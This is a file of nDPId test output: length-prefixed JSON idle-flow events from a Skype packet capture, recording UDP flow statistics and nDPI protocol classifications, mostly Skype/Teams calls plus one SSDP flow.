+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 